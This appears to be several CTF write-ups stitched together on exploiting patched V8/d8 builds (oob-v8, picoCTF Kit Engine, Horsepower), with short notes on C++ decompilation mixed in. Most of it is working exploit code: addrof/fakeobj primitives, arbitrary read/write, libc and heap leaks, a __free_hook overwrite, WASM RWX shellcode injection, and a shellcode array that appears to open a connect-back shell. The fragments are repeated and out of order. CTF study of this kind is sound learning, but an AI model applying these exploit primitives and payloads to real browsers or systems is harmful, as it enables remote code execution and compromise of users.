0x00007ffff71ec000 0x00007ffff73ec000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73ec000 0x00007ffff73f0000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73f0000 0x00007ffff73f2000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so
[...]
gef➤ x/200gx 0x1d8734480000
0x1d8734480000: 0x0000000000040000 0x0000000000000004
0x1d8734480010: 0x00005555563a7f60 0x000055555631a2e0
0x1d8734480020: 0x00001d8734480000 0x0000000000040000
0x1d8734480030: 0x0000555556329b60 0x00001d8734480001
0x1d8734480040: 0x0000555556394e90 0x00001d8734480138
0x1d8734480050: 0x00001d87344c0000 0x0000000000000000
0x1d8734480060: 0x0000000000000000 0x0000000000000000
[...]
let heap_leak = arb_read(map_reg_start + 0x10n);
let heap_base = heap_leak - 0xaef60n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16))
gef➤ x/200gx 0x5555562f9000
0x5555562f9000 <_ZN2v85Shell15local_counters_E+2400>: 0x0000000000000000 0x0000000000000000
0x5555562f9010 <_ZN2v85Shell15local_counters_E+2416>: 0x0000000000000000 0x0000000000000000
0x5555562f9020 <_ZN2v85Shell15local_counters_E+2432>: 0x0000000000000000 0x0000000000000000
[...]
gef➤ x/10gx 0x000055555631a2e0
0x55555631a2e0: 0x00005555562dbea8 0x0000000000001000
0x55555631a2f0: 0x0000000000001000 0x0000000000000021
[...]
let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));
let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));
readelf -a d8 | grep -i read
[...]
000000d9a4c0 003d00000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
[...]
let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));
gef➤ p &system
$1 = (int (*)(const char *)) 0x7ffff7054420 <__libc_system>
gef➤ p &__free_hook
$2 = (void (**)(void *, const void *)) 0x7ffff73f28e8 <__free_hook>
// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;
console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");
// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
function fakeobj(addr) {
float_arr[0] = itof(addr); // placed desired address into index 0
float_arr.oob(map_obj); // change to object map
let fake = float_arr[0]; // get fake object
float_arr.oob(map_float); // swap map back
return fake; // return object
}
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// index 0 will returns the arbitrary read value
return ftoi(fake[0]);
}
function initial_arb_write(addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
function arb_write(addr, val) {
// set up ArrayBuffer and DataView objects
let buf = new ArrayBuffer(8);
let dataview = new DataView(buf);
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
// write to address to backing store
initial_arb_write(backing_store_addr, addr);
// write data to offset 0, with little endian true
dataview.setBigUint64(0, BigInt(val), true);
}
// exploit
// leaks
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16));
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16));
let map_reg_start = ftoi(map_float) - 0x2ed9n;
console.log("[+] Map Region Start: 0x" + map_reg_start.toString(16));
let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));
let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));
let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));
// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;
console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
gef➤ vmmap
[...]
0x000035d2131ff000 0x000035d21b141000 0x0000000000000000 ---
0x0000396a8d0b5000 0x0000396a8d0b6000 0x0000000000000000 rwx
0x0000396a8d0b6000 0x0000396acd0b5000 0x0000000000000000 ---
[...]
console.log("[+] WASM Mod at 0x" + addrof(wasm_mod).toString(16));
console.log("[+] WASM Instance at 0x" + addrof(wasm_instance).toString(16));
console.log("[+] F at 0x" + addrof(f).toString(16));
gef➤ run --allow-natives-syntax --shell exploit2.js
[+] Address of Arbitrary RW Array: 0x22322b10f919
[+] WASM Mod at 0x22322b10fcc9
[+] WASM Instance at 0x45c390e13a1
[+] F at 0x45c390e1599
V8 version 7.5.0 (candidate)
d8> ^C
gef➤ vmmap
[...]
0x0000311254159000 0x000031125415a000 0x0000000000000000 rwx
[...]
gef➤ search-pattern 0x0000311254159000
[+] Searching '\x00\x90\x15\x54\x12\x31\x00\x00' in memory
[+] In (0x45c390c0000-0x45c39100000), permission=rw-
0x45c390e1428 - 0x45c390e1448 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
[+] In '[heap]'(0x5555562f9000-0x5555563c6000), permission=rw-
0x5555563a1e38 - 0x5555563a1e58 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
0x5555563acfe0 - 0x5555563ad000 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
0x5555563ad000 - 0x5555563ad020 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
0x5555563ad120 - 0x5555563ad140 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));
function copy_shellcode(addr, shellcode) {
// create a buffer of 0x100 bytes
let buf = new ArrayBuffer(0x100);
let dataview = new DataView(buf);
// overwrite the backing store so the 0x100 bytes can be written to where we want
// this is similar to the arb_write() function
// but we have to redo it because we want to write way more than 8 bytes
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
initial_arb_write(backing_store_addr, addr);
// write the shellcode 4 bytes at a time
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
console.log("[+] Copying Shellcode...");
copy_shellcode(rwx_base, shellcode);
console.log("[+] Running Shellcode...");
f();
$ ./d8 --shell exploit2.js
[+] Address of Arbitrary RW Array: 0x19b85504fea1
[+] WASM Instance at 0x189e40ca1761
[+] RWX Region located at 0x29686af10000
[+] Copying Shellcode...
[+] Running Shellcode...
Warning: Cannot convert string "-adobe-symbol-*-*-*-*-*-120-*-*-*-*-*-*" to type FontStruct
// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
function fakeobj(addr) {
float_arr[0] = itof(addr); // placed desired address into index 0
float_arr.oob(map_obj); // change to object map
let fake = float_arr[0]; // get fake object
float_arr.oob(map_float); // swap map back
return fake; // return object
}
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// index 0 will returns the arbitrary read value
return ftoi(fake[0]);
}
function initial_arb_write(addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
function arb_write(addr, val) {
// set up ArrayBuffer and DataView objects
let buf = new ArrayBuffer(8);
let dataview = new DataView(buf);
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
// write to address to backing store
initial_arb_write(backing_store_addr, addr);
// write data to offset 0, with little endian true
dataview.setBigUint64(0, BigInt(val), true);
}
// wasm exploit
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
console.log("[+] WASM Instance at 0x" + (addrof(wasm_instance)).toString(16));
// leak RWX base
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc)
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));
// shellcode time
function copy_shellcode(addr, shellcode) {
// create a buffer of 0x100 bytes
let buf = new ArrayBuffer(0x100);
let dataview = new DataView(buf);
// overwrite the backing store so the 0x100 can be written to where we want
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
initial_arb_write(backing_store_addr, addr);
// write the shellcode 4 bytes at a time
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
// pop it
console.log("[+] Copying Shellcode...");
copy_shellcode(rwx_base, shellcode);
console.log("[+] Running Shellcode...");
f();
<html>
<head>
<script src="exploit2.js"></script>
</head>
</html>
$ ./chrome --no-sandbox ../../index.html
var shellcode = ['0x6a58296a', '0x016a5f02', '0x050f995e', '0x68525f50', '0x0100007f', '0x5c116866', '0x6a026a66', '0x5e54582a', '0x0f5a106a', '0x5e026a05', '0x0f58216a', '0xceff4805', '0x016af679', '0x50b94958', '0x77737361', '0x41203a64', '0x6a5e5451', '0x050f5a08', '0x48c03148', '0x0f08c683', '0x31b84805', '0x35343332', '0x56383736', '0x75af485f', '0x583b6a1a', '0xbb485299', '0x6e69622f', '0x68732f2f', '0x525f5453', '0x54575a54', '0x90050f5e']
How decompilers do stuff
These tricks include notes for Binary Ninja, but IDA looks similar (and I'm sure GHidra does too).
Example code:
char rax_3 = *std::vector<uint8_t>::operator[](&vector, sx.q(j))
*std::vector<uint8_t>::operator[](&vector, sx.q(j)) = *std::string::operator[](arg1, other: j) ^ rax_3
Looks really bizarre and overwhelming, but look at the words. std::vector<uint8_t>::operator[]
literally means the operator []
, the subscript operator. It wants the subscript of the first parameter, with the second parameter being the argument. So
std::vector<uint8_t>::operator[](&vector, sx.q(j))
Is really just
vector[j]
Also, if it doesn't make sense, change types to add extra arguments! Detection is pretty trash, and it might help a lot.
A non-exhaustive list is:
std::T::~T
Destructor of class T
T*
std::vector<T>::operator[](&vector, sx.q(j))
vector[j]
T*
, int64_t
A lesson in floating-point form
You will need an account for picoCTF to play this. The accounts are free, and there are hundreds of challenges for all categories - highly recommend it!
We are given d8
, source.tar.gz
and server.py
. Let's look at server.py
first:
#!/usr/bin/env python3
# With credit/inspiration to the v8 problem in downUnder CTF 2020
import os
import subprocess
import sys
import tempfile
def p(a):
print(a, flush=True)
MAX_SIZE = 20000
input_size = int(input("Provide size. Must be < 5k:"))
if input_size >= MAX_SIZE:
p(f"Received size of {input_size}, which is too big")
sys.exit(-1)
p(f"Provide script please!!")
script_contents = sys.stdin.read(input_size)
p(script_contents)
# Don't buffer
with tempfile.NamedTemporaryFile(buffering=0) as f:
f.write(script_contents.encode("utf-8"))
p("File written. Running. Timeout is 20s")
res = subprocess.run(["./d8", f.name], timeout=20, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p("Run Complete")
p(f"Stdout {res.stdout}")
p(f"Stderr {res.stderr}")
It's very simple - you input the size of the file, and then you input the file itself. The file contents get written to a javascript file, then run under ./d8
with the output returned. Let's check the source code.
$ 7z x source.tar.gz
$ tar -xvf source.tar
The patch
is as follows:
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..35195b9261 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -979,6 +979,53 @@ struct ModuleResolutionData {
} // namespace
+uint64_t doubleToUint64_t(double d){
+ union {
+ double d;
+ uint64_t u;
+ } conv = { .d = d };
+ return conv.u;
+}
+
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+ __asm__("int3");
+}
+
+void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
+ Isolate* isolate = args.GetIsolate();
+ if(args.Length() != 1) {
+ return;
+ }
+
+ double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ if (func == (double *)-1) {
+ printf("Unable to allocate memory. Contact admin\n");
+ return;
+ }
+
+ if (args[0]->IsArray()) {
+ Local<Array> arr = args[0].As<Array>();
+
+ Local<Value> element;
+ for (uint32_t i = 0; i < arr->Length(); i++) {
+ if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
+ Local<Number> val = element.As<Number>();
+ func[i] = val->Value();
+ }
+ }
+
+ printf("Memory Dump. Watch your endianness!!:\n");
+ for (uint32_t i = 0; i < arr->Length(); i++) {
+ printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
+ }
+
+ printf("Starting your engine!!\n");
+ void (*foo)() = (void(*)())func;
+ foo();
+ }
+ printf("Done\n");
+}
+
void Shell::ModuleResolutionSuccessCallback(
const FunctionCallbackInfo<Value>& info) {
std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2248,15 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
- String::NewFromUtf8Literal(isolate, "global"));
+ // Add challenge builtin, and remove some unintented solutions
+ global_template->Set(isolate, "AssembleEngine", FunctionTemplate::New(isolate, AssembleEngine));
+ global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
-
global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
- global_template->Set(isolate, "printErr",
- FunctionTemplate::New(isolate, PrintErr));
- global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
- global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
- global_template->Set(isolate, "readbuffer",
- FunctionTemplate::New(isolate, ReadBuffer));
- global_template->Set(isolate, "readline",
- FunctionTemplate::New(isolate, ReadLine));
- global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
- global_template->Set(isolate, "setTimeout",
- FunctionTemplate::New(isolate, SetTimeout));
- // Some Emscripten-generated code tries to call 'quit', which in turn would
- // call C's exit(). This would lead to memory leaks, because there is no way
- // we can terminate cleanly then, so we need a way to hide 'quit'.
if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
- global_template->Set(isolate, "testRunner",
- Shell::CreateTestRunnerTemplate(isolate));
- global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
- global_template->Set(isolate, "performance",
- Shell::CreatePerformanceTemplate(isolate));
- global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
- // Prevent fuzzers from creating side effects.
- if (!i::FLAG_fuzzing) {
- global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
- }
- global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
#ifdef V8_FUZZILLI
global_template->Set(
@@ -2243,11 +2265,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
#endif // V8_FUZZILLI
- if (i::FLAG_expose_async_hooks) {
- global_template->Set(isolate, "async_hooks",
- Shell::CreateAsyncHookTemplate(isolate));
- }
-
return global_template;
}
@@ -2449,10 +2466,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
v8::Isolate::kMessageLog);
}
- isolate->SetHostImportModuleDynamicallyCallback(
+ /*isolate->SetHostImportModuleDynamicallyCallback(
Shell::HostImportModuleDynamically);
isolate->SetHostInitializeImportMetaObjectCallback(
- Shell::HostInitializeImportMetaObject);
+ Shell::HostInitializeImportMetaObject);*/
#ifdef V8_FUZZILLI
// Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..4591d27f65 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,9 @@ class Shell : public i::AllStatic {
kNoProcessMessageQueue = false
};
+ static void AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args);
+ static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
static bool ExecuteString(Isolate* isolate, Local<String> source,
Local<Value> name, PrintResult print_result,
ReportExceptions report_exceptions,
This just just generally quite strange. The only particularly relevant part is the new AssembleEngine()
function:
void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
Isolate* isolate = args.GetIsolate();
if(args.Length() != 1) {
return;
}
double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (func == (double *)-1) {
printf("Unable to allocate memory. Contact admin\n");
return;
}
if (args[0]->IsArray()) {
Local<Array> arr = args[0].As<Array>();
Local<Value> element;
for (uint32_t i = 0; i < arr->Length(); i++) {
if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
Local<Number> val = element.As<Number>();
func[i] = val->Value();
}
}
printf("Memory Dump. Watch your endianness!!:\n");
for (uint32_t i = 0; i < arr->Length(); i++) {
printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
}
printf("Starting your engine!!\n");
void (*foo)() = (void(*)())func;
foo();
}
printf("Done\n");
}
This is a pretty strange function to have, but the process is simple. FIrst there are a couple of checks, and if they are not passed, they fail:
Check if the number of arguments is 1
Assign 4096 bytes of memory with RWX permissions
Then, if the first argument is an array, we cast it to one and store it in arr
. We then loop through arr
, and for every index i
, we store the result in the local variable element
. If it's a number, it gets written to func
at a set offset. Essentially, it copies the entirety of arr
to func
! With some added checks to make sure the types are correct.
There is then a memory dump of func
, just to simplify things.
And then finally execution is continued from func
, like a classic shellcoding challenge!
This isn't really much of a V8-specific challenge - the data we are input is run as shellcode, and the output is returned to us.
HOWEVER
val->Value()
actually returns a floating-point value (a double
), not an integer. Maybe you could get this from the source code, but you could also get it from the mmap()
line:
double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
You can see it's all double
values. This means we have to inject shellcode, but in their floating-point form rather than as integers.
If you've read the oob-v8 writeup, you know there are common functions for converting the integers you want to be written to memory to the floating-point form that would write them (and if you haven't, check it out).
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
So now we just need to get valid shellcode, convert it into 64-bit integers and find the float equivalent. Once we make the array, we simply call AssembleEngine()
on it and it executes it for us. Easy peasy!
We can't actually interact with the process, only get stdout
and stderr
, so we'll have to go to a direct read of flag.txt
. We can use pwntools to generate the shellcode for this:
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
shellcode = asm(shellcraft.cat('flag.txt'))
We want to convert shellcode
to bytes, then to 64-bit integers so we can transform them to floats. Additionally, the 64-bit integers have to have the bytes in reverse order for endiannes! We'll let python do all of that for us:
from pwn import *
# set all the context
context.os = 'linux'
context.arch = 'amd64'
# create the shellcode
shellcode = asm(shellcraft.cat('flag.txt'))
print(shellcode)
# pad it to a multiple of 8 with NOP instructions
# this means the converstion to 8-byte values is smoother
shellcode += b'\x90' * 4
# get the hex codes for every byte and store them as a string in the list
shellcode = [hex(c)[2:].rjust(2, '0') for c in shellcode]
# get the shellcode bytes in packs of 8, in reverse order for endianness, with 0x at the front
eight_bytes = ['0x' + ''.join(shellcode[i:i+8][::-1]) for i in range(0, len(shellcode), 8)]
print(eight_bytes)
We can dump this (after minor cleanup) into exploit.js
and convert the entire list to floats before calling AssembleEngine()
. Make sure you put the n
after every 64-bit value, to signify to the javascript that it's a BigInt
type!
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
// needs to have the `n` to be a BigInt value!
payload = [0x66b848240cfe016an, 0x507478742e67616cn, 0xf631e7894858026an, 0x7fffffffba41050fn, 0x016a58286ac68948n, 0x90909090050f995fn]
payload_float = []
for (let i = 0; i < payload.length; i++) {
payload_float.push(itof(payload[i]))
}
AssembleEngine(payload_float)
And finally we can deliver it with a python script using pwntools
, and parse the input to get the important bit:
from pwn import *
with open("exploit.js", "rb") as f:
exploit = f.read()
p = remote('mercury.picoctf.net', 48700)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)
p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())
And we get the flag:
picoCTF{vr00m_vr00m_48f07b402a4020e0}
Reversing C++ can be a pain, and part of the reason for that is that in C++ a std::string
can be dynamically-sized. This means its appearance in memory is more complex than a char[]
that you would find in C, because std::string
actually contains 3 fields:
Pointer to the allocated memory (the actual string itself)
Logical size of string
Size of allocated memory (which must be bigger than or equal to logical size)
The actual string content is dynamically allocated on the heap. As a result, std::string
looks something like this in memory:
class std::string
{
char* buf;
size_t len;
size_t allocated_len;
};
This is not necessarily a consistent implementation, which is why many decompilers don't recognise strings immediately - they can vary between compilers and different versions.
Decompilers can confuse us even more depending on how they optimise small objects. Simply put, we would prefer to avoid allocating space on the heap unless absolutely necessary, so if the string is short enough, we try to fit it within the std::string
struct itself. For example:
class std::string
{
char* buf;
size_t len;
// union is used to store different data types in the same memory location
// this saves space in case only one of them is necessary
union
{
size_t allocated_len;
char local_buf[8];
};
};
In this example, if the string is 8 bytes or less, local_buf
is used and the string is stored there instead. buf
will then point at local_buf
, and no heap allocation is used.
An analysis of different compilers' approaches to Small Object Optimization can be found here.
Another OOB, but with pointer compression
server.py
is the same as in Kit Engine - send it a JS file, it gets run.
Let's check the patch
again:
diff --git a/BUILD.gn b/BUILD.gn
index 9482b977e3..6a3f1e2d0f 100644
--- a/BUILD.gn
+++ b/BUILD.gn
@@ -1175,6 +1175,7 @@ action("postmortem-metadata") {
}
torque_files = [
+ "src/builtins/array-horsepower.tq",
"src/builtins/aggregate-error.tq",
"src/builtins/array-at.tq",
"src/builtins/array-copywithin.tq",
diff --git a/src/builtins/array-horsepower.tq b/src/builtins/array-horsepower.tq
new file mode 100644
index 0000000000..7ea53ca306
--- /dev/null
+++ b/src/builtins/array-horsepower.tq
@@ -0,0 +1,17 @@
+// Gotta go fast!!
+
+namespace array {
+
+transitioning javascript builtin
+ArraySetHorsepower(
+ js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
+ try {
+ const h: Smi = Cast<Smi>(horsepower) otherwise End;
+ const a: JSArray = Cast<JSArray>(receiver) otherwise End;
+ a.SetLength(h);
+ } label End {
+ Print("Improper attempt to set horsepower");
+ }
+ return receiver;
+}
+}
\ No newline at end of file
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..abfb553864 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -999,6 +999,10 @@ void Shell::ModuleResolutionSuccessCallback(
resolver->Resolve(realm, module_namespace).ToChecked();
}
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+ __asm__("int3");
+}
+
void Shell::ModuleResolutionFailureCallback(
const FunctionCallbackInfo<Value>& info) {
std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2205,14 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
- String::NewFromUtf8Literal(isolate, "global"));
+ // Remove some unintented solutions
+ global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
-
global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
- global_template->Set(isolate, "printErr",
- FunctionTemplate::New(isolate, PrintErr));
- global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
- global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
- global_template->Set(isolate, "readbuffer",
- FunctionTemplate::New(isolate, ReadBuffer));
- global_template->Set(isolate, "readline",
- FunctionTemplate::New(isolate, ReadLine));
- global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
- global_template->Set(isolate, "setTimeout",
- FunctionTemplate::New(isolate, SetTimeout));
- // Some Emscripten-generated code tries to call 'quit', which in turn would
- // call C's exit(). This would lead to memory leaks, because there is no way
- // we can terminate cleanly then, so we need a way to hide 'quit'.
if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
- global_template->Set(isolate, "testRunner",
- Shell::CreateTestRunnerTemplate(isolate));
